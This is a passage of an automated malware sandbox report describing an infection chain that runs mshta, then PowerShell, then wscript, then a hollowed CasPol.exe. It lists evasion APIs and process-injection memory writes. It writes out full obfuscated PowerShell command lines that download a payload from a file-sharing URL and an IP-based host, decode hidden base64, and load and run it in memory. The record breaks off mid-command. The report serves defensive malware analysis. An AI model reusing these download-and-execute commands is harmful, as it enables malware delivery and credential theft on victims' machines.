                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5643
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3983
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5879
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3882
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1354
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 576
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4259
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9752
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_12-69285
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_12-69547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API coverage: 9.6 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896 | Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832 | Thread sleep count: 5879 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820 | Thread sleep count: 3882 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868 | Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172 | Thread sleep count: 1354 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8176 | Thread sleep count: 576 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8188 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344 | Thread sleep count: 4259 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7344 | Thread sleep count: 5515 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1152 | Thread sleep time: -21213755684765971s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2300 | Thread sleep count: 143 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2300 | Thread sleep time: -429000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3436 | Thread sleep count: 40 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2300 | Thread sleep count: 9752 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2300 | Thread sleep time: -29256000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 7816 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_045710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_045710F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_04576580 FindFirstFileExA,12_2_04576580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_10005C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_10007E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,12_2_100073F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10018AD0 FindFirstFileExA,12_2_10018AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,18_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00418981 memset,GetSystemInfo,18_2_00418981
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: wscript.exe, 00000007.00000002.1562874159.0000000004AB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1475637134.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .0 $tVmNetworkAdPSDscXMachine.psm1l
                    Source: powershell.exe, 00000001.00000002.1600493692.0000000007707000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1604114869.0000000008622000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1600493692.00000000076B4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3861630082.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3863782930.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: mshta.exe, 00000000.00000003.1432152369.0000000005B58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\f.L
                    Source: powershell.exe, 00000003.00000002.1475637134.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PEventVmNetwoPSDesiredStateConfiguration.types.ps1xml
                    Source: powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 0000000A.00000002.1921166368.000000000750A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrQ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00442554 mov eax, dword ptr fs:[00000030h] 12_2_00442554
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_04574AB4 mov eax, dword ptr fs:[00000030h] 12_2_04574AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10014BBC mov eax, dword ptr fs:[00000030h] 12_2_10014BBC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,12_2_00410B19
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B44
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00433CD7 SetUnhandledExceptionFilter,12_2_00433CD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_04572639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_04572639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_045760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_045760E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_04572B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_04572B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_1000B299 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_1000B299
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_1000D8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1000D8D1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_1000AFD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1000AFD4

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match File source: amsi32_752.amsi.csv, type: OTHER
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00417245
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: CB4008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00418754 mouse_event,12_2_00418754
                    Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'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'+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP"
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jffvicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkzc1uwxbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfrkloaxrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifnrexneeixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmeuf5ymesc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrmziaegsdwludcagicagicagicagicagicagicagicagicagicagicagihrqyyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbpbxf1agx2bujjktsnicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicaid2prt094rwxyiiagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbnd3vyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrrvto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk0lje3ms4xmzgvmzi5l2nyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzlbmdvb2qudelgiiwijgvuvjpbufbeqvrbxgnyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzllnziuyismcwwkttzdgfsvc1zbgvfccgzkttprxggicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgnyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzllnziuyi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('shnimageurl = b4fhttps://101'+'7.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmtkj3lc6sqticoc_t35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4f;shnwebcl'+'ient = new-object system.net.webclient;s'+'hnimagebytes = shnwebclient.downlo'+'addata(shnimageurl);shnimagetext = [system.text.encoding]'+'::utf8.getstring(shnim'+'agebytes);shnstartflag = b4f<<base64_start>>b4f;shnendflag = '+'b4f<<base64_end>>b4f;shnstartindex = sh'+'nimagete'+'xt.indexof(shnstartflag);shnendind'+'ex = shnimagetext.indexof(shnendflag);shnstartindex -ge 0 -and shnendindex -gt shnstart'+'index;shnst'+'artindex += shnstartflag'+'.length;shnbase'+'64length = shnendindex - shnstartindex;shnbase64command = shn'+'i'+'magetext.substring(shnstartindex, shnbase64length);shnbase64reversed = -join (shnbase64command.tochararray() s7g foreach-object { shn_ })[-1..-(shnbase64command.length)];shncommandbytes = [system.convert]::frombase64s'+'tring(shnba'+'se64reversed);shnloadedassembly = [system.reflection.assembly]::load'+'(shncommandbytes);shnvaimethod = [dnlib.io.home].getmethod(b4fvaib4f);shnvaimethod.invo'+'ke(shnnull, @(b4ftxt.edssrf/923/831.171.49.32//:ptthb4f, b4fdesativadob4f, b4fdesativadob4'+'f, 